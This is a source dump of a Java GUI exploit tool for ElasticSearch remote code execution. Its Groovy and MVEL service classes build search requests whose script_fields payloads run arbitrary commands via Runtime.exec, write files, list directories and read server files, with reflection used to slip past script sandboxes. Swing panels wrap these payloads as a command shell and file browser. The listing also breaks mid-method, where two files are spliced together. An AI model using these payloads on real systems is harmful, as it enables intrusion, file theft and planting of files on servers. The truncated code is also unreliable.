├── README.md ├── esExploit.jar └── src └── org └── vti ├── enumeration └── Version.java ├── main └── AppMain.java ├── service ├── MyService.java └── impl │ ├── ESGroovyServiceImpl.java │ └── ESMvelServiceImp.java ├── ui ├── CmdPanel.java ├── FileViewPanel.java ├── MainPanel.java └── UploadPanel.java └── util └── RequestUtil.java /README.md: -------------------------------------------------------------------------------- 1 | # master 2 | 3 | ElasticSearch Remote Code Execution! 4 | 5 | There is Java Code Exploit. 6 | -------------------------------------------------------------------------------- /esExploit.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Svti/ElasticSearchEXP/ac4047af6cdb25bc6d7302af4a07020e927a9c91/esExploit.jar -------------------------------------------------------------------------------- /src/org/vti/enumeration/Version.java: -------------------------------------------------------------------------------- 1 | package org.vti.enumeration; 2 | 3 | public enum Version { 4 | Groovy , MVEL , 5 | } 6 | -------------------------------------------------------------------------------- /src/org/vti/main/AppMain.java: -------------------------------------------------------------------------------- 1 | package org.vti.main; 2 | 3 | import javax.swing.UIManager; 4 | 5 | import org.vti.ui.MainPanel; 6 | 7 | public class AppMain { 8 | 9 | public static void main(String[] args) { 10 | try { 11 | UIManager.setLookAndFeel("com.sun.java.swing.plaf.nimbus.NimbusLookAndFeel"); 12 | new MainPanel(); 13 | } catch (Exception e) { 14 | e.printStackTrace(); 15 | } 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /src/org/vti/service/MyService.java: -------------------------------------------------------------------------------- 1 | package org.vti.service; 2 | 3 | import java.util.List; 4 | 5 | public interface MyService { 6 | 7 | public String 
doExecuteCMD (String host,String param) throws Exception;
8 |
9 |     public boolean doUpload (String host,String path,String content) throws Exception;
10 |
11 |     public List listRoots(String host) throws Exception;
12 |
13 |     public List getFiles(String host,String path) throws Exception;
14 |
15 |     public boolean isDirectory (String host,String path) throws Exception;
16 |
17 |     public String getFileContent (String host,String path) throws Exception;
18 |
19 | }
20 |
--------------------------------------------------------------------------------
/src/org/vti/service/impl/ESGroovyServiceImpl.java:
--------------------------------------------------------------------------------
1 | package org.vti.service.impl;
2 |
3 | import java.util.ArrayList;
4 | import java.util.List;
5 |
6 | import org.vti.service.MyService;
7 | import org.vti.util.RequestUtil;
8 |
9 | import com.google.gson.JsonArray;
10 | import com.google.gson.JsonObject;
11 | import com.google.gson.JsonParser;
12 |
     /**
      * MyService implementation for the Groovy case. Each method builds a JSON search
      * body whose "script_fields.exp.script" holds a Groovy expression ("lang": "groovy"),
      * sends it to host + "/_search?pretty" through RequestUtil.doPostRequest, and reads
      * the value back from hits.hits[0].fields.exp in the JSON reply.
      *
      * The expressions do not name Runtime, File or the stream classes directly: they are
      * looked up with java.lang.Math.class.forName("...") and driven through
      * getConstructor/newInstance. Caller-supplied strings (param, path, content) are
      * concatenated into the script text as-is.
      *
      * NOTE(review): RequestUtil is not part of this listing, so the HTTP details are
      * assumed from the method name (presumably a POST with the string as body).
      * NOTE(review): the forName indirection presumably exists to get past a name-based
      * script sandbox on the node; confirm against the targeted release.
      * NOTE(review), for defenders: these requests only succeed where the node evaluates
      * scripts supplied inside a search request. Presumably the relevant controls are
      * turning dynamic scripting off (script.disable_dynamic, script.groovy.sandbox.enabled
      * where the release has them), upgrading, and keeping the REST port away from
      * untrusted networks. A search body that combines "script_fields" with "forName",
      * "java.lang.Runtime" or "java.io.File" is a usable detection string.
      */
13 | public class ESGroovyServiceImpl implements MyService{
14 |
         /**
          * Sends a script that passes {@code param} to Runtime.exec on the node and reads
          * the process output with readLines().
          *
          * @param host  base URL; "/_search?pretty" is appended
          * @param param command string, spliced into the script between escaped quotes
          * @return the elements of fields.exp[0], each followed by "\n"
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
15 |     public String doExecuteCMD (String host, String param) throws Exception{
16 |
17 |         String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" +
18 |                 ":\"java.lang.Math.class.forName(\\\"java.io.BufferedReader\\\")" +
19 |                 ".getConstructor(java.io.Reader.class)" +
20 |                 ".newInstance(java.lang.Math.class.forName(\\\"java.io.InputStreamReader\\\")" +
21 |                 ".getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class" +
22 |                 ".forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\""+param+"\\\")" +
23 |                 ".getInputStream())).readLines()\",\"lang\": \"groovy\"}}}";
24 |
25 |         String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl);
26 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
             // get(0) assumes the search returned at least one hit.
27 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
28 |         JsonObject fields=hits.getAsJsonObject("fields");
29 |
30 |         JsonArray array=fields.get("exp").getAsJsonArray().get(0).getAsJsonArray();
31 |
32 |         String str="";
33 |
34 |         for (int i = 0; i < array.size(); i++) {
35 |             str+=array.get(i).getAsString()+"\n";
36 |         }
37 |
38 |         return str;
39 |     }
40 |
         /**
          * Sends a script that opens a FileOutputStream on {@code path} on the node and
          * writes the bytes of {@code content} to it.
          *
          * @param host    base URL; "/_search?pretty" is appended
          * @param path    file path, spliced into the script unescaped
          * @param content text to write, spliced into the script unescaped
          * @return true when the first element of fields.exp serialises to "null"
          *         (presumably the result of the void write call), false otherwise
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
41 |     @Override
42 |     public boolean doUpload(String host, String path, String content)
43 |             throws Exception {
44 |
45 |         String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" +
46 |                 ":\"java.lang.Math.class.forName(\\\"java.io.FileOutputStream\\\")" +
47 |                 ".getConstructor(java.io.File.class)" +
48 |                 ".newInstance(java.lang.Math.class.forName(\\\"java.io.File\\\")" +
49 |                 ".getConstructor(java.lang.String.class)" +
50 |                 ".newInstance(\\\""+ path +"\\\"))" +
51 |                 ".write(java.lang.Math.class.forName(\\\"java.lang.String\\\")" +
52 |                 ".getConstructor(java.lang.String.class).newInstance(\\\""+content+"\\\").getBytes())\"," +
53 |                 "\"lang\": \"groovy\"}}}";
54 |
55 |
56 |         String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl);
57 |
58 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
59 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
60 |         JsonObject fields=hits.getAsJsonObject("fields");
61 |
62 |         String echo=fields.get("exp").getAsJsonArray().get(0).toString();
63 |
64 |         if (echo.equals("null")) {
65 |             return true;
66 |         }else {
67 |             return false;
68 |         }
69 |     }
70 |
         /**
          * Sends a script that calls File.listRoots() on the node.
          *
          * @param host base URL; "/_search?pretty" is appended
          * @return a list with one entry per element of fields.exp[0]; every entry is
          *         produced by array.getAsString()
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
71 |     @Override
72 |     public List listRoots(String host) throws Exception{
73 |
74 |         String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" +
75 |                 ":\"java.lang.Math.class.forName(\\\"java.io.File\\\")" +
76 |                 ".listRoots()\",\"lang\": \"groovy\"}}}";
77 |
78 |         String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl);
79 |
80 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
81 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
82 |         JsonObject fields=hits.getAsJsonObject("fields");
83 |
84 |         JsonArray array=fields.get("exp").getAsJsonArray().get(0).getAsJsonArray();
85 |
86 |         List list= new ArrayList<>();
87 |
88 |         for (int i = 0; i < array.size(); i++) {
89 |             list.add(array.getAsString());
90 |         }
91 |         return list;
92 |     }
93 |
         /**
          * Sends a script that calls list() on a File built from {@code path} on the node.
          *
          * @param host base URL; "/_search?pretty" is appended
          * @param path directory path, spliced into the script unescaped
          * @return the entries of fields.exp[0] as strings, or null when that array is empty
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
94 |     @Override
95 |     public List getFiles(String host, String path) throws Exception {
96 |
97 |         String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" +
98 |                 ":\"java.lang.Math.class.forName(\\\"java.io.File\\\")" +
99 |                 ".getConstructor(java.lang.String.class)" +
100 |                 ".newInstance(\\\""+ path +"\\\").list()\",\"lang\": \"groovy\"}}}";
101 |
102 |         String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl);
103 |
104 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
105 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
106 |         JsonObject fields=hits.getAsJsonObject("fields");
107 |
108 |         JsonArray array=fields.get("exp").getAsJsonArray().get(0).getAsJsonArray();
109 |
110 |         if (array.size()>0) {
111 |             List list= new ArrayList<>();
112 |
113 |             for (int i = 0; i < array.size(); i++) {
114 |                 list.add(array.get(i).getAsString());
115 |             }
116 |             return list;
117 |         }else {
118 |             return null;
119 |         }
120 |     }
121 |
         /**
          * Sends a script that calls isDirectory() on a File built from {@code path}.
          *
          * @param host base URL; "/_search?pretty" is appended
          * @param path path to test, spliced into the script unescaped
          * @return the first element of fields.exp read as a boolean
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
122 |     @Override
123 |     public boolean isDirectory(String host, String path) throws Exception {
124 |
125 |         String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" +
126 |                 ":\"java.lang.Math.class.forName(\\\"java.io.File\\\")" +
127 |                 ".getConstructor(java.lang.String.class)" +
128 |                 ".newInstance(\\\""+ path +"\\\").isDirectory()\",\"lang\": \"groovy\"}}}";
129 |
130 |         String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl);
131 |
132 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
133 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
134 |         JsonObject fields=hits.getAsJsonObject("fields");
135 |
136 |         boolean flag= fields.get("exp").getAsJsonArray().get(0).getAsBoolean();
137 |
138 |         return flag;
139 |
140 |     }
141 |
         /**
          * Sends a script that wraps a FileInputStream on {@code path} in an
          * InputStreamReader and BufferedReader and calls readLines() on it.
          *
          * @param host base URL; "/_search?pretty" is appended
          * @param path file path, spliced into the script unescaped
          * @return the elements of fields.exp[0], each followed by "\n"
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
142 |     @Override
143 |     public String getFileContent(String host, String path) throws Exception {
144 |
145 |         String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" +
146 |                 ":\"java.lang.Math.class.forName(\\\"java.io.BufferedReader\\\")" +
147 |                 ".getConstructor(java.io.Reader.class)" +
148 |                 ".newInstance(java.lang.Math.class.forName(\\\"java.io.InputStreamReader\\\")" +
149 |                 ".getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class" +
150 |                 ".forName(\\\"java.io.FileInputStream\\\").getConstructor(java.lang.String.class)" +
151 |                 ".newInstance(\\\""+ path +"\\\")" +
152 |                 ")).readLines()\",\"lang\": \"groovy\"}}}";
153 |
154 |         String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl);
155 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
156 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
157 |         JsonObject fields=hits.getAsJsonObject("fields");
158 |
159 |         JsonArray array=fields.get("exp").getAsJsonArray().get(0).getAsJsonArray();
160 |
161 |         String text="";
162 |
163 |         for (int i = 0; i < array.size(); i++) {
164 |             text+=array.get(i).getAsString()+"\n";
165 |         }
166 |
167 |         return text;
168 |
169 |     }
170 |
171 | }
172 |
--------------------------------------------------------------------------------
/src/org/vti/service/impl/ESMvelServiceImp.java:
--------------------------------------------------------------------------------
1 | package org.vti.service.impl;
2 |
3 | import java.net.URLEncoder;
4 | import java.util.ArrayList;
5 | import java.util.List;
6 |
7 | import org.vti.service.MyService;
8 | import org.vti.util.RequestUtil;
9 |
10 | import com.google.gson.JsonObject;
11 | import com.google.gson.JsonParser;
12 |
     /**
      * MyService implementation that places the whole search body, percent-encoded, in
      * the "source" query parameter of a "/_search" URL and fetches it through
      * RequestUtil.doGetRequest. The request sets no "lang" key for the script.
      *
      * NOTE(review): with no "lang" the node's default script language applies; the
      * class name suggests MVEL, confirm against the targeted release.
      * NOTE(review), for defenders: because the script travels in the URL, it is
      * presumably visible in HTTP access and proxy logs as a "/_search?source=" request
      * containing "script_fields".
      */
13 | public class ESMvelServiceImp implements MyService{
14 |
         /**
          * Requests a script that runs {@code param} through Runtime.getRuntime().exec on
          * the node, reads the output line by line and returns it with "\r\n" appended
          * to each line.
          *
          * The percent-encoded body sits in the "source" query parameter and carries no
          * "lang" key. {@code param} is passed through URLEncoder.encode before it is
          * placed between the escaped quotes.
          *
          * NOTE(review), for defenders: a "/_search?source=" URL that contains
          * "script_fields" together with "Runtime.getRuntime" is a usable detection string
          * for access or proxy logs, presumably in its percent-encoded form.
          *
          * @param host  base URL; "/" and the request path are appended
          * @param param command string
          * @return hits.hits[0].fields.exp read as a string
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
15 |     @Override
16 |     public String doExecuteCMD(String host, String param) throws Exception {
17 |
18 |         String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," +
19 |                 "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;" +
20 |                 "BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\\%22" + URLEncoder.encode(param, "UTF-8") + "\\%22).getInputStream()));" +
21 |                 "StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str%2b%5C%22%5Cr%5Cn%5C%22);}sb.toString();%22}}}";
22 |
             // cmdUrl already starts with "/", so the final URL is host + "//_search?...".
23 |         String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl);
24 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
             // get(0) assumes the search returned at least one hit.
25 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
26 |         JsonObject fields=hits.getAsJsonObject("fields");
27 |
28 |         return fields.get("exp").getAsString();
29 |     }
30 |
         /**
          * Requests a script that writes {@code content} to {@code path} on the node with
          * a UTF-8 BufferedWriter and evaluates to "success" when the file exists afterwards.
          *
          * Backslashes in {@code path} are turned into "/" and runs of "/" collapsed
          * before URL-encoding; {@code content} is URL-encoded as well. The method also
          * prints {@code content} and the parsed "fields" object to standard output.
          *
          * @param host    base URL; "/" and the request path are appended
          * @param path    destination file path
          * @param content text to write
          * @return true when fields.exp equals "success", false otherwise
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
31 |     @Override
32 |     public boolean doUpload(String host, String path, String content)
33 |             throws Exception {
34 |
35 |         System.out.println(content);
36 |
37 |         String cmdUrl="/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," +
38 |                 "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;" +
39 |                 "\\nimport%20java.io.*;\\nFile%20f%20=%20new%20File(%5C%22" + URLEncoder.encode(path.replaceAll("\\\\", "/").replaceAll("/+", "/"),"UTF-8") + "%5C%22);" +
40 |                 "if(f.exists()){%5C%22exists%5C%22.toString();}" +
41 |                 "BufferedWriter%20bw%20=%20new%20BufferedWriter(new%20OutputStreamWriter(" +
42 |                 "new%20FileOutputStream(f),%5C%22UTF-8%5C%22));bw.write(%5C%22" + URLEncoder.encode(content,"UTF-8") + "%5C%22);" +
43 |                 "bw.flush();bw.close();if(f.exists()){%5C%22success%5C%22.toString();}%22}}}";
44 |         String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl);
45 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
46 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
47 |         JsonObject fields=hits.getAsJsonObject("fields");
48 |
49 |         System.out.println(fields);
50 |
51 |         String echo= fields.get("exp").getAsString();
52 |
53 |         if (echo.equals("success")) {
54 |             return true;
55 |         }else {
56 |             return false;
57 |         }
58 |     }
59 |
         /**
          * Requests a script that joins the paths from File.listRoots() on the node with
          * "\r\n" and splits the returned string on "\n".
          *
          * @param host base URL; "/" and the request path are appended
          * @return the pieces of fields.exp after splitting on "\n"
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
60 |     @Override
61 |     public List listRoots(String host) throws Exception{
62 |
63 |         String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," +
64 |                 "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;" +
65 |                 "File%20[]%20files%20=File.listRoots();" +
66 |                 "StringBuilder%20sb%20=%20new%20StringBuilder();" +
67 |                 "for(File%20file:files){str=file.getPath();sb.append(str%2b%5C%22%5Cr%5Cn%5C%22);}sb.toString();%22}}}";
68 |         String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl);
69 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
70 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
71 |         JsonObject fields=hits.getAsJsonObject("fields");
72 |
73 |         String roots= fields.get("exp").getAsString();
74 |
75 |         String array[]=roots.split("\n");
76 |
77 |         List distList=new ArrayList();
78 |
79 |         for (int i = 0; i < array.length; i++) {
80 |             distList.add(array[i]);
81 |         }
82 |
83 |         return distList;
84 |
85 |     }
86 |
         /**
          * Requests a script that joins the names from new File(path).listFiles() on the
          * node with "\r\n" and splits the returned string on "\n".
          *
          * Unlike doExecuteCMD and doUpload, {@code path} is concatenated into the URL
          * without URLEncoder.encode.
          *
          * @param host base URL; "/" and the request path are appended
          * @param path directory path
          * @return the pieces of fields.exp after splitting on "\n", or null when the
          *         split yields no elements
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
87 |     @Override
88 |     public List getFiles(String host, String path) throws Exception {
89 |
90 |         String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," +
91 |                 "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;" +
92 |                 "File%20[]%20files%20=new%20File(%20\\%22"+path+"\\%22).listFiles();" +
93 |                 "StringBuilder%20sb%20=%20new%20StringBuilder();" +
94 |                 "for(File%20file:files){str=file.getName();sb.append(str%2b%5C%22%5Cr%5Cn%5C%22);}sb.toString();%22}}}";
95 |
96 |         String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl);
97 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
98 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
99 |         JsonObject fields=hits.getAsJsonObject("fields");
100 |         String text= fields.get("exp").getAsString();
101 |
102 |         String arrays[]=text.split("\n");
103 |
104 |         if (arrays.length>0) {
105 |
                 // NOTE(review): "ListfileList" is how the page shows this declaration;
                 // the generic type argument appears to have been lost in extraction.
106 |             ListfileList=new ArrayList();
107 |
108 |             for (int i = 0; i < arrays.length; i++) {
109 |                 fileList.add(arrays[i]);
110 |             }
111 |
112 |             return fileList;
113 |         }else {
114 |             return null;
115 |         }
116 |
117 |     }
118 |
         /**
          * Requests a script that evaluates new File(path).isDirectory() on the node.
          * {@code path} is concatenated into the URL without URLEncoder.encode.
          *
          * @param host base URL; "/" and the request path are appended
          * @param path path to test
          * @return fields.exp read as a boolean
          * @throws Exception from the request, or when the reply lacks hits[0].fields.exp
          */
119 |     @Override
120 |     public boolean isDirectory(String host, String path) throws Exception {
121 |
122 |         String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," +
123 |                 "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;" +
124 |                 "File%20file%20=new%20File(%20\\%22"+path+"\\%22);" +
125 |                 "file.isDirectory();%22}}}";
126 |
127 |         String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl);
128 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
129 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
130 |         JsonObject fields=hits.getAsJsonObject("fields");
131 |         boolean flag= fields.get("exp").getAsBoolean();
132 |
133 |         return flag;
134 |     }
135 |
         /**
          * Requests a script that reads the file at {@code path} on the node one byte at a
          * time and returns the concatenation of Integer.toHexString(m) for each byte; the
          * client side then starts decoding that hex text.
          * {@code path} is concatenated into the URL without URLEncoder.encode.
          *
          * NOTE(review): the decoding loop and the return statement are not visible; see
          * the truncation note below.
          */
136 |     @Override
137 |     public String getFileContent(String host, String path) throws Exception {
138 |
139 |         String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," +
140 |                 "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;" +
141 |                 "InputStream%20inputStream%20=%20new%20FileInputStream(new%20File(%20\\%22"+path+"\\%22));" +
142 |                 "StringBuilder%20sb=%20new%20StringBuilder();int%20m=0;while((m=inputStream.read())!=-1)" +
143 |                 "{str=Integer.toHexString(m);sb.append(str);}sb.toString();%22}}}";
144 |         String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl);
145 |         JsonObject object= new JsonParser().parse(result).getAsJsonObject();
146 |         JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject();
147 |         JsonObject fields=hits.getAsJsonObject("fields");
148 |         String content= fields.get("exp").getAsString();
149 |
150 |         String viewText="";
151 |         String h = "0123456789abcdef";
             // NOTE(review): the listing is truncated inside the next line. The numbering
             // jumps from 152 to 120 and the code that follows calls textPane and
             // JOptionPane, so the rest of this method, the end of this file and the start
             // of another file (presumably CmdPanel.java, going by the file tree) are missing.
152 |         for (int i = 0; i 0) {
                 // "请稍候..." is shown while the request runs ("Please wait...").
120 |                 textPane.setText("请稍候...");
121 |
122 |                 MyService service=null;
123 |
                 // Picks the service implementation from the selected Version.
124 |                 if (version.equals(Version.Groovy)) {
125 |                     service=new ESGroovyServiceImpl();
126 |                 }else {
127 |                     service=new ESMvelServiceImp();
128 |                 }
129 |
130 |                 textPane.setText(service.doExecuteCMD(host, command));
131 |
132 |             }else {
                     // "请输入执行命令" = "Please enter a command to execute".
133 |                 JOptionPane.showMessageDialog(this, "请输入执行命令");
134 |             }
135 |         } catch (Exception exp) {
                 // Any failure is shown in the text pane as the exception message only.
136 |             textPane.setText(exp.getMessage());
137 |         }
138 |     }
139 |
         /** Stores the target base URL used by later requests. */
140 |     public void setReqestUrl(String host){
141 |         this.host=host;
142 |     }
143 |
         /** Stores which service implementation (Groovy or MVEL) later requests use. */
144 |     public void setVersion(Version version){
145 |         this.version=version;
146 |     }
147 | }
148 |
--------------------------------------------------------------------------------
/src/org/vti/ui/FileViewPanel.java:
--------------------------------------------------------------------------------
1 | package org.vti.ui;
2 |
3 | import java.awt.event.ActionEvent;
4 | import java.awt.event.ActionListener;
5 | import java.awt.event.MouseAdapter;
6 | import java.awt.event.MouseEvent;
7 | import java.io.File;
8 | import java.io.FileOutputStream;
9 | import java.util.List;
10 |
11 | import javax.swing.JFileChooser;
12 | import javax.swing.JMenuItem;
13 | import javax.swing.JOptionPane;
14 | import javax.swing.JPanel;
15
| import javax.swing.GroupLayout; 16 | import javax.swing.JPopupMenu; 17 | import javax.swing.JScrollPane; 18 | import javax.swing.JTabbedPane; 19 | import javax.swing.JTextPane; 20 | import javax.swing.JTree; 21 | import javax.swing.GroupLayout.Alignment; 22 | import javax.swing.JSplitPane; 23 | import javax.swing.tree.DefaultMutableTreeNode; 24 | import javax.swing.tree.DefaultTreeModel; 25 | 26 | import org.vti.enumeration.Version; 27 | import org.vti.service.MyService; 28 | import org.vti.service.impl.ESGroovyServiceImpl; 29 | import org.vti.service.impl.ESMvelServiceImp; 30 | 31 | public class FileViewPanel extends JPanel{ 32 | 33 | private static final long serialVersionUID = 1L; 34 | 35 | private DefaultMutableTreeNode root=new DefaultMutableTreeNode("我的电脑"); 36 | 37 | private JTree tree; 38 | 39 | private JTabbedPane fileContentJTabbedPane; 40 | 41 | private JTextPane fileContentJTextPane; 42 | 43 | private JPopupMenu rightJPopupMenu; 44 | 45 | private JFileChooser filesaveChooser; 46 | 47 | private String host; 48 | 49 | private Version version; 50 | 51 | public FileViewPanel(){ 52 | setSize(600,460); 53 | setVisible(true); 54 | 55 | JSplitPane splitPane = new JSplitPane(); 56 | splitPane.setDividerLocation(160); 57 | 58 | tree=new JTree(root); 59 | 60 | JScrollPane fileJtreeJScrollPane=new JScrollPane(tree); 61 | 62 | fileContentJTabbedPane=new JTabbedPane(); 63 | 64 | this.fileContentJTabbedPane.addMouseListener(new MouseAdapter() { 65 | public void mouseClicked(MouseEvent e) { 66 | if ((e.getClickCount() == 2)&&(FileViewPanel.this.fileContentJTabbedPane.getTabCount()> 0)) { 67 | FileViewPanel.this.fileContentJTabbedPane.remove(FileViewPanel.this.fileContentJTabbedPane.getSelectedIndex()); 68 | } 69 | } 70 | }); 71 | 72 | tree.addMouseListener(new MouseAdapter() { 73 | 74 | @Override 75 | public void mouseClicked(MouseEvent e) { 76 | 77 | if (tree.getSelectionCount() != 0 && e.getButton() == 1 && e.getClickCount() == 2) { 78 | 79 | if 
(tree.getSelectionPath().toString().equals("[我的电脑]")) { 80 | 81 | new Thread(new Runnable() { 82 | @Override 83 | public void run() { 84 | getRoots(); 85 | } 86 | }).start(); 87 | 88 | }else { 89 | 90 | new Thread(new Runnable() { 91 | @Override 92 | public void run() { 93 | 94 | String path = ""; 95 | String longText = tree.getSelectionPath().toString(); 96 | String[] text = longText.substring(1, longText.length() - 1).split(","); 97 | for (int k = 0; k < text.length; k++) { 98 | path = path + text[k].trim() + "/"; 99 | } 100 | path = path.substring(4, path.length()); 101 | String rquestPath = path.replaceAll("\\\\", "/"); 102 | 103 | DefaultMutableTreeNode selectedNode = (DefaultMutableTreeNode)tree.getLastSelectedPathComponent(); 104 | 105 | if(isDirectory(rquestPath)){ 106 | List fileNames= getFiles(rquestPath); 107 | 108 | selectedNode.removeAllChildren(); 109 | for (String fileName:fileNames) { 110 | selectedNode.add(new DefaultMutableTreeNode(fileName)); 111 | } 112 | 113 | tree.repaint(); 114 | }else { 115 | String fileName = selectedNode.toString(); 116 | String content = getFileContent(rquestPath); 117 | fileContentJTextPane = new JTextPane(); 118 | fileContentJTextPane.setEditable(false); 119 | fileContentJTextPane.setText(content); 120 | fileContentJTextPane.setCaretPosition(0); 121 | fileContentJTabbedPane.addTab(fileName,fileContentJTextPane); 122 | } 123 | 124 | 125 | } 126 | }).start(); 127 | 128 | } 129 | 130 | } 131 | 132 | if (tree.getSelectionCount() != 0 && e.getButton() == 3) { 133 | rightJPopupMenu = new JPopupMenu(); 134 | 135 | final JMenuItem download = new JMenuItem("下载"); 136 | download.addActionListener(new ActionListener() { 137 | @Override 138 | public void actionPerformed(ActionEvent e) { 139 | if (e.getSource()==download) { 140 | 141 | String path = ""; 142 | String longText = tree.getSelectionPath().toString(); 143 | String[] text = longText.substring(1, longText.length() - 1).split(","); 144 | for (int k = 0; k < text.length; k++) 
{ 145 | path = path + text[k].trim() + "/"; 146 | } 147 | path = path.substring(4, path.length()); 148 | final String rquestPath = path.replaceAll("\\\\", "/"); 149 | 150 | new Thread(new Runnable() { 151 | 152 | @Override 153 | public void run() { 154 | 155 | if(!isDirectory(rquestPath)){ 156 | filesaveChooser = new JFileChooser(); 157 | int option =filesaveChooser.showSaveDialog(null); 158 | 159 | if (option == JFileChooser.APPROVE_OPTION) { 160 | File file = filesaveChooser.getSelectedFile(); 161 | try { 162 | FileOutputStream fos=new FileOutputStream(file); 163 | String content=getFileContent(rquestPath); 164 | fos.write(content.getBytes()); 165 | fos.flush(); 166 | fos.close(); 167 | JOptionPane.showMessageDialog(null, "恭喜你,下载成功"); 168 | } catch (Exception exp) { 169 | exp.printStackTrace(); 170 | JOptionPane.showMessageDialog(null, "对不起,下载失败"); 171 | } 172 | } 173 | } 174 | } 175 | }).start(); 176 | 177 | } 178 | } 179 | }); 180 | 181 | 182 | final JMenuItem refresh = new JMenuItem("刷新"); 183 | refresh.addActionListener(new ActionListener() { 184 | @Override 185 | public void actionPerformed(ActionEvent e) { 186 | if (e.getSource()==refresh) { 187 | 188 | new Thread(new Runnable() { 189 | 190 | @Override 191 | public void run() { 192 | 193 | String path = ""; 194 | String longText = tree.getSelectionPath().toString(); 195 | String[] text = longText.substring(1, longText.length() - 1).split(","); 196 | for (int k = 0; k < text.length; k++) { 197 | path = path + text[k].trim() + "/"; 198 | } 199 | path = path.substring(4, path.length()); 200 | String rquestPath = path.replaceAll("\\\\", "/"); 201 | 202 | if(isDirectory(rquestPath)){ 203 | DefaultMutableTreeNode selectedNode = (DefaultMutableTreeNode)tree.getLastSelectedPathComponent(); 204 | 205 | List fileNames= getFiles(rquestPath); 206 | 207 | selectedNode.removeAllChildren(); 208 | for (String fileName:fileNames) { 209 | selectedNode.add(new DefaultMutableTreeNode(fileName)); 210 | } 211 | 212 | 
